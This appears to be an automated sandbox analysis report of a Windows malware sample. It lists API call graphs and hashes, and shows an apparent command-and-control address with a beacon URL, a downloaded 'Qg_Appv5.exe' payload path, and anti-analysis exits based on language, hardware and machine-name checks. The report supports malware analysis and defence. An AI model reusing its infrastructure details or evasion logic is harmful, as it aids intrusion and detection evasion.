                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 043233E1
                                                                                                                                                                                                                                              • std::locale::_Init.LIBCPMT ref: 04323428
                                                                                                                                                                                                                                                • Part of subcall function 04327FDA: __EH_prolog3.LIBCMT ref: 04327FE1
                                                                                                                                                                                                                                                • Part of subcall function 04327FDA: std::_Lockit::_Lockit.LIBCPMT ref: 04327FEC
                                                                                                                                                                                                                                                • Part of subcall function 04327FDA: std::locale::_Setgloballocale.LIBCPMT ref: 04328007
                                                                                                                                                                                                                                                • Part of subcall function 04327FDA: _Yarn.LIBCPMT ref: 0432801D
                                                                                                                                                                                                                                                • Part of subcall function 04327FDA: std::_Lockit::~_Lockit.LIBCPMT ref: 0432805D
                                                                                                                                                                                                                                                • Part of subcall function 04323651: __EH_prolog.LIBCMT ref: 04323656
                                                                                                                                                                                                                                                • Part of subcall function 04323651: std::_Lockit::_Lockit.LIBCPMT ref: 04323665
                                                                                                                                                                                                                                                • Part of subcall function 04323651: int.LIBCPMT ref: 0432367C
                                                                                                                                                                                                                                                • Part of subcall function 04323651: std::locale::_Getfacet.LIBCPMT ref: 04323685
                                                                                                                                                                                                                                                • Part of subcall function 04323651: std::_Lockit::~_Lockit.LIBCPMT ref: 043236CC
                                                                                                                                                                                                                                                • Part of subcall function 04321AE6: __CxxThrowException@8.LIBVCRUNTIME ref: 04321B30
                                                                                                                                                                                                                                                • Part of subcall function 04321AE6: std::system_error::system_error.LIBCPMT ref: 04321B3F
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Lockitstd::_$std::locale::_$H_prologLockit::_Lockit::~_$Exception@8GetfacetH_prolog3InitSetgloballocaleThrowYarnstd::system_error::system_error
                                                                                                                                                                                                                                              • String ID: =wB
                                                                                                                                                                                                                                              • API String ID: 372095707-727605340
                                                                                                                                                                                                                                              • Opcode ID: d2aeb5b8bdefacdf6576f532fa65c8c549f3bf19b84c6d288b6d5a26cffb91a9
                                                                                                                                                                                                                                              • Instruction ID: 045c0b88f437fd76bdbb58d7eb7a4bb1f0408dc1024841df345b28c25508eb41
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d2aeb5b8bdefacdf6576f532fa65c8c549f3bf19b84c6d288b6d5a26cffb91a9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EC2115B1A00B06AFE714DF69C285659FBF0FF08314F60926ED01997A80D774B964CF94
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 04324078
                                                                                                                                                                                                                                              • std::locale::_Init.LIBCPMT ref: 0432409A
                                                                                                                                                                                                                                                • Part of subcall function 04327FDA: __EH_prolog3.LIBCMT ref: 04327FE1
                                                                                                                                                                                                                                                • Part of subcall function 04327FDA: std::_Lockit::_Lockit.LIBCPMT ref: 04327FEC
                                                                                                                                                                                                                                                • Part of subcall function 04327FDA: std::locale::_Setgloballocale.LIBCPMT ref: 04328007
                                                                                                                                                                                                                                                • Part of subcall function 04327FDA: _Yarn.LIBCPMT ref: 0432801D
                                                                                                                                                                                                                                                • Part of subcall function 04327FDA: std::_Lockit::~_Lockit.LIBCPMT ref: 0432805D
                                                                                                                                                                                                                                                • Part of subcall function 043243F0: __EH_prolog.LIBCMT ref: 043243F5
                                                                                                                                                                                                                                                • Part of subcall function 043243F0: std::_Lockit::_Lockit.LIBCPMT ref: 04324404
                                                                                                                                                                                                                                                • Part of subcall function 043243F0: int.LIBCPMT ref: 0432441B
                                                                                                                                                                                                                                                • Part of subcall function 043243F0: std::locale::_Getfacet.LIBCPMT ref: 04324424
                                                                                                                                                                                                                                                • Part of subcall function 043243F0: std::_Lockit::~_Lockit.LIBCPMT ref: 0432446B
                                                                                                                                                                                                                                                • Part of subcall function 04323651: __EH_prolog.LIBCMT ref: 04323656
                                                                                                                                                                                                                                                • Part of subcall function 04323651: std::_Lockit::_Lockit.LIBCPMT ref: 04323665
                                                                                                                                                                                                                                                • Part of subcall function 04323651: int.LIBCPMT ref: 0432367C
                                                                                                                                                                                                                                                • Part of subcall function 04323651: std::locale::_Getfacet.LIBCPMT ref: 04323685
                                                                                                                                                                                                                                                • Part of subcall function 04323651: std::_Lockit::~_Lockit.LIBCPMT ref: 043236CC
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Lockitstd::_$std::locale::_$H_prologLockit::_Lockit::~_$Getfacet$H_prolog3InitSetgloballocaleYarn
                                                                                                                                                                                                                                              • String ID: wB
                                                                                                                                                                                                                                              • API String ID: 3898505750-480074513
                                                                                                                                                                                                                                              • Opcode ID: 68e52b31ccd65e299d1839df556b82d3a44aaaaa4a1098e86e78dc1aaf3716b6
                                                                                                                                                                                                                                              • Instruction ID: 28684e76ce711191e5a773b5dad8bc14de23fbb1548428ec8bb0e08b01edbb97
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 68e52b31ccd65e299d1839df556b82d3a44aaaaa4a1098e86e78dc1aaf3716b6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0221D471901224DFE718DF68DA41BADB7B4FF58314F20415ED8159B281DB74BA05CB64
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00417217
                                                                                                                                                                                                                                              • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00417224
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AddressProc__crt_fast_encode_pointer
                                                                                                                                                                                                                                              • String ID: -@
                                                                                                                                                                                                                                              • API String ID: 2279764990-2564449678
                                                                                                                                                                                                                                              • Opcode ID: 159ffde8afdd61bab2c645bd26f6e363fc6904dc3b18735a3e366a8bdcbdbe8f
                                                                                                                                                                                                                                              • Instruction ID: f4ec00a39f4fcae9ee9be6b99cea2ca8987fdb4a8322dd671adfd3fbebc4ff23
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 159ffde8afdd61bab2c645bd26f6e363fc6904dc3b18735a3e366a8bdcbdbe8f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 65110A33A042205B9B369E19EC80ADB73B5EB847247164172FD29BB354DB34DCC2C6D9
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: H_prolog
                                                                                                                                                                                                                                              • String ID: /cpa/ping.php?substr=%s&s=ab&sub=%s$one
                                                                                                                                                                                                                                              • API String ID: 3519838083-2876206925
                                                                                                                                                                                                                                              • Opcode ID: f53bc21c6a473a4d107a45cccef11255b17f5841f7796051e35078cbeb47afbb
                                                                                                                                                                                                                                              • Instruction ID: e7ca98ceabaac091dbd3726a8ff27b6b7a62161aca4fa919c284864c970c2bea
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f53bc21c6a473a4d107a45cccef11255b17f5841f7796051e35078cbeb47afbb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EF1104B2A00524BBEB059F98CD40BEEB7B9FF48724F104529F804E7240D375BA508BA0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: H_prolog
                                                                                                                                                                                                                                              • String ID: /cpa/ping.php?substr=%s&s=ab&sub=%s$one
                                                                                                                                                                                                                                              • API String ID: 3519838083-2876206925
                                                                                                                                                                                                                                              • Opcode ID: 6ce4b3f3f3a476027b50502c85f5921e8b78a39e23d084b56ba9ef5ace9e0aba
                                                                                                                                                                                                                                              • Instruction ID: 15a4cf94b989c4b5e0a43b8c54f1cb92ed8d46dd15ee7e513d2018d21c6c36cd
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6ce4b3f3f3a476027b50502c85f5921e8b78a39e23d084b56ba9ef5ace9e0aba
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AB11C232A01014BBDB00AF89DC01BAEB779EF49314F40003EF805A3291D3799B5187A8
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00402FEA
                                                                                                                                                                                                                                              • std::locale::_Init.LIBCPMT ref: 0040300E
                                                                                                                                                                                                                                                • Part of subcall function 00407D73: __EH_prolog3.LIBCMT ref: 00407D7A
                                                                                                                                                                                                                                                • Part of subcall function 00407D73: std::_Lockit::_Lockit.LIBCPMT ref: 00407D85
                                                                                                                                                                                                                                                • Part of subcall function 00407D73: std::locale::_Setgloballocale.LIBCPMT ref: 00407DA0
                                                                                                                                                                                                                                                • Part of subcall function 00407D73: _Yarn.LIBCPMT ref: 00407DB6
                                                                                                                                                                                                                                                • Part of subcall function 00407D73: std::_Lockit::~_Lockit.LIBCPMT ref: 00407DF6
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Lockitstd::_std::locale::_$H_prologH_prolog3InitLockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                                                                                              • String ID: T*@
                                                                                                                                                                                                                                              • API String ID: 4198646248-2370032326
                                                                                                                                                                                                                                              • Opcode ID: d0f7d386ae4efe2390fbf90dfbd3daa7514f827ed2e8e8cb20172591b6377ab5
                                                                                                                                                                                                                                              • Instruction ID: dd23321e4c46181b40e5f98da61592ca99a58c04279906981af05f8f2703ec12
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d0f7d386ae4efe2390fbf90dfbd3daa7514f827ed2e8e8cb20172591b6377ab5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2321B0B5A00A06AFC305CF6AD581995FBF4FF48314B40826FE80987B50E774B924CFA4
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00404373
                                                                                                                                                                                                                                                • Part of subcall function 00403A42: __EH_prolog.LIBCMT ref: 00403A47
                                                                                                                                                                                                                                              • __Getcoll.LIBCPMT ref: 004043CF
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: H_prolog$Getcoll
                                                                                                                                                                                                                                              • String ID: u@@
                                                                                                                                                                                                                                              • API String ID: 206117190-736001340
                                                                                                                                                                                                                                              • Opcode ID: 457c0db2275d5d41219090803dc9521f21b1157a3f189203d6fa5eb114c840f9
                                                                                                                                                                                                                                              • Instruction ID: c779ab9f98323ff8677db40664eca0c2ffeff6dd5383222ff5ea7a01e0671416
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 457c0db2275d5d41219090803dc9521f21b1157a3f189203d6fa5eb114c840f9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 871170B19012099FCB04EFA9C581A9DF7B4FF44304F10847FE545BB281DB789A44CB95
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: H_prolog
                                                                                                                                                                                                                                              • String ID: [vB$ios_base::failbit set
                                                                                                                                                                                                                                              • API String ID: 3519838083-2429468811
                                                                                                                                                                                                                                              • Opcode ID: 7f09e6f22c187b78d4661f81628029d25d5b8f4a86949919d9877c3638318d4b
                                                                                                                                                                                                                                              • Instruction ID: 35c8f57c40f201c35498085ad6a538050e2bcf46408958c2aec7df40f34c8ca0
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7f09e6f22c187b78d4661f81628029d25d5b8f4a86949919d9877c3638318d4b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F60184725001199FDB04DF58C940BFEBBB8EF59328F14915EE401A7250D7B46E45DBA4
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetTempPathA.KERNEL32(00002000,?,?,/1/Qg_Appv5.exe,04345DF5,?,?,?,?,?,?,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 0434658B
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: PathTemp
                                                                                                                                                                                                                                              • String ID: /1/Qg_Appv5.exe$Qg_Appv5.exe
                                                                                                                                                                                                                                              • API String ID: 2920410445-1161945460
                                                                                                                                                                                                                                              • Opcode ID: 95d314670ccd1522b250ad5fefde607822e255a2179401dbe6e03e497b03dfc3
                                                                                                                                                                                                                                              • Instruction ID: 3e366c84bdf96a866e9d5b535984a510e8080325c4dffffd42e75957f429669b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 95d314670ccd1522b250ad5fefde607822e255a2179401dbe6e03e497b03dfc3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 69E026023048010A5F290C2A3C1AAEBDF43DFC751034882AAD88207249CD412C0BD670
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetTempPathA.KERNEL32(00002000,?,?,/1/Qg_Appv5.exe,00425B8E,?,?,?,?,?,?,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 00426324
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: PathTemp
                                                                                                                                                                                                                                              • String ID: /1/Qg_Appv5.exe$Qg_Appv5.exe
                                                                                                                                                                                                                                              • API String ID: 2920410445-1161945460
                                                                                                                                                                                                                                              • Opcode ID: 95d314670ccd1522b250ad5fefde607822e255a2179401dbe6e03e497b03dfc3
                                                                                                                                                                                                                                              • Instruction ID: d0e7d276ca818b5a52dc3a1143c2d6cc19e203c39cc505e05bbffc3e6100e946
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 95d314670ccd1522b250ad5fefde607822e255a2179401dbe6e03e497b03dfc3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 17E026123088110A5F29482D3818AAFDF03DFD261038582AAD88307345CD410C0BD2B0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?), ref: 0433AAFA
                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0433AB08
                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0433AB63
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1717984340-0
                                                                                                                                                                                                                                              • Opcode ID: 2fe2766fc0ccf28db447755f4ca5e52f9ac34e5cb848ceccec86b5a16212b3b4
                                                                                                                                                                                                                                              • Instruction ID: 05e29892ced5c863c47efc0459c26f945d06365941b6d883ff0add7b8a8df65e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2fe2766fc0ccf28db447755f4ca5e52f9ac34e5cb848ceccec86b5a16212b3b4
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2441EA31600645AFDF21AF64D848BBE7BAAEF01322F1551EDE999AB1E0DB30A901C750
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?), ref: 0041A893
                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0041A8A1
                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0041A8FC
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1717984340-0
                                                                                                                                                                                                                                              • Opcode ID: b4f25852fafc3cb0f15b20596d9ae719c618a575aca992b75c45ceb5274d71e6
                                                                                                                                                                                                                                              • Instruction ID: ef74c1d6368c920b9f03e6eff6a6fb43ae41f0a69c5039c94680ed31baa92590
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b4f25852fafc3cb0f15b20596d9ae719c618a575aca992b75c45ceb5274d71e6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D410770602206AFCB219F65C844AEF7BA4AF01310F16456FED599B291DB388CE2C75A
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                              Execution Coverage:4.3%
                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                              Signature Coverage:2.4%
                                                                                                                                                                                                                                              Total number of Nodes:2000
                                                                                                                                                                                                                                              Total number of Limit Nodes:42
                                                                                                                                                                                                                                              execution_graph 78754 6c20c930 GetSystemInfo VirtualAlloc 78755 6c20c9a3 GetSystemInfo 78754->78755 78756 6c20c973 78754->78756 78758 6c20c9d0 78755->78758 78759 6c20c9b6 78755->78759 78770 6c22b320 5 API calls ___raise_securityfailure 78756->78770 78758->78756 78762 6c20c9d8 VirtualAlloc 78758->78762 78759->78758 78761 6c20c9bd 78759->78761 78760 6c20c99b 78761->78756 78763 6c20c9c1 VirtualFree 78761->78763 78764 6c20c9f0 78762->78764 78765 6c20c9ec 78762->78765 78763->78756 78771 6c22cbe8 GetCurrentProcess TerminateProcess 78764->78771 78765->78756 78770->78760 78772 4136b0 78817 402130 78772->78817 78792 4136f0 78958 414400 GetProcessHeap HeapAlloc GetComputerNameA 78792->78958 78796 413724 78797 416fb0 4 API calls 78796->78797 78798 41372b 78797->78798 78799 416fb0 4 API calls 78798->78799 78800 413732 78799->78800 78801 416fb0 4 API calls 78800->78801 78802 413739 78801->78802 78803 416fb0 4 API calls 78802->78803 78804 413740 78803->78804 78968 416ea0 78804->78968 78806 4137cc 78972 4135e0 GetSystemTime 78806->78972 78807 413749 78807->78806 78809 413782 OpenEventA 78807->78809 78811 4137b5 CloseHandle Sleep 78809->78811 78812 413799 78809->78812 78814 4137ca 78811->78814 78816 4137a1 CreateEventA 78812->78816 78814->78807 78816->78806 79118 4043b0 LocalAlloc 78817->79118 78820 4043b0 2 API calls 78821 40215d 78820->78821 78822 4043b0 2 API calls 78821->78822 78823 402176 78822->78823 78824 4043b0 2 API calls 78823->78824 78825 40218f 78824->78825 78826 4043b0 2 API calls 78825->78826 78827 4021a8 78826->78827 78828 4043b0 2 API calls 78827->78828 78829 4021c1 78828->78829 78830 4043b0 2 API calls 78829->78830 78831 4021da 78830->78831 78832 4043b0 2 API calls 78831->78832 78833 4021f3 78832->78833 78834 4043b0 2 API calls 78833->78834 78835 40220c 78834->78835 78836 4043b0 2 API calls 78835->78836 78837 402225 78836->78837 78838 4043b0 2 API calls 78837->78838 78839 40223e 78838->78839 78840 4043b0 2 API calls 78839->78840 78841 402257 78840->78841 78842 4043b0 2 API calls 78841->78842 78843 402270 78842->78843 78844 4043b0 2 API calls 78843->78844 78845 402289 78844->78845 78846 4043b0 2 API calls 78845->78846 78847 4022a2 78846->78847 78848 4043b0 2 API calls 78847->78848 78849 4022bb 78848->78849 78850 4043b0 2 API calls 78849->78850 78851 4022d4 78850->78851 78852 4043b0 2 API calls 78851->78852 78853 4022ed 78852->78853 78854 4043b0 2 API calls 78853->78854 78855 402306 78854->78855 78856 4043b0 2 API calls 78855->78856 78857 40231f 78856->78857 78858 4043b0 2 API calls 78857->78858 78859 402338 78858->78859 78860 4043b0 2 API calls 78859->78860 78861 402351 78860->78861 78862 4043b0 2 API calls 78861->78862 78863 40236a 78862->78863 78864 4043b0 2 API calls 78863->78864 78865 402383 78864->78865 78866 4043b0 2 API calls 78865->78866 78867 40239c 78866->78867 78868 4043b0 2 API calls 78867->78868 78869 4023b5 78868->78869 78870 4043b0 2 API calls 78869->78870 78871 4023ce 78870->78871 78872 4043b0 2 API calls 78871->78872 78873 4023e7 78872->78873 78874 4043b0 2 API calls 78873->78874 78875 402400 78874->78875 78876 4043b0 2 API calls 78875->78876 78877 402419 78876->78877 78878 4043b0 2 API calls 78877->78878 78879 402432 78878->78879 78880 4043b0 2 API calls 78879->78880 78881 40244b 78880->78881 78882 4043b0 2 API calls 78881->78882 78883 402464 78882->78883 78884 4043b0 2 API calls 78883->78884 78885 40247d 78884->78885 78886 4043b0 2 API calls 78885->78886 78887 402496 78886->78887 78888 4043b0 2 API calls 78887->78888 78889 4024af 78888->78889 78890 4043b0 2 API calls 78889->78890 78891 4024c8 78890->78891 78892 4043b0 2 API calls 78891->78892 78893 4024e1 78892->78893 78894 4043b0 2 API calls 78893->78894 78895 4024fa 78894->78895 78896 4043b0 2 API calls 78895->78896 78897 402513 78896->78897 78898 4043b0 2 API calls 78897->78898 78899 40252c 78898->78899 78900 4043b0 2 API calls 78899->78900 78901 402545 78900->78901 78902 4043b0 2 API calls 78901->78902 78903 40255e 78902->78903 78904 415ed0 78903->78904 79122 415dc0 GetPEB 78904->79122 78906 415ed8 78907 416103 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 78906->78907 78910 415eea 78906->78910 78908 416164 GetProcAddress 78907->78908 78909 41617d 78907->78909 78908->78909 78911 4161b6 78909->78911 78912 416186 GetProcAddress GetProcAddress 78909->78912 78913 415efc 21 API calls 78910->78913 78914 4161d8 78911->78914 78915 4161bf GetProcAddress 78911->78915 78912->78911 78913->78907 78916 4161e1 GetProcAddress 78914->78916 78917 4161f9 78914->78917 78915->78914 78916->78917 78918 4136c0 78917->78918 78919 416202 GetProcAddress GetProcAddress 78917->78919 78920 416d40 78918->78920 78919->78918 78921 416d50 78920->78921 78922 4136cd 78921->78922 78923 416d7e lstrcpy 78921->78923 78924 401190 78922->78924 78923->78922 78925 4011a8 78924->78925 78926 4011d7 78925->78926 78927 4011cf ExitProcess 78925->78927 78928 401120 GetSystemInfo 78926->78928 78929 401144 78928->78929 78930 40113c ExitProcess 78928->78930 78931 4010d0 GetCurrentProcess VirtualAllocExNuma 78929->78931 78932 401101 ExitProcess 78931->78932 78933 401109 78931->78933 79123 401060 VirtualAlloc 78933->79123 78936 4011e0 79127 415090 78936->79127 78939 401209 __aulldiv 78940 40125a 78939->78940 78941 401252 ExitProcess 78939->78941 78942 413430 GetUserDefaultLangID 78940->78942 78943 413493 78942->78943 78944 413452 78942->78944 78950 401150 78943->78950 78944->78943 78945 413481 ExitProcess 78944->78945 78946 413463 ExitProcess 78944->78946 78947 413477 ExitProcess 78944->78947 78948 41348b ExitProcess 78944->78948 78949 41346d ExitProcess 78944->78949 78948->78943 78951 414400 3 API calls 78950->78951 78952 40115e 78951->78952 78953 40118c 78952->78953 79129 4143c0 GetProcessHeap HeapAlloc GetUserNameA 78952->79129 78957 4143c0 GetProcessHeap HeapAlloc GetUserNameA 78953->78957 78955 401177 78955->78953 78956 401184 ExitProcess 78955->78956 78957->78792 78959 413703 78958->78959 78960 416fb0 78959->78960 79130 416d10 78960->79130 78962 416fc1 lstrlen 78964 416fe0 78962->78964 78963 417018 79131 416da0 78963->79131 78964->78963 78966 416ffa lstrcpy 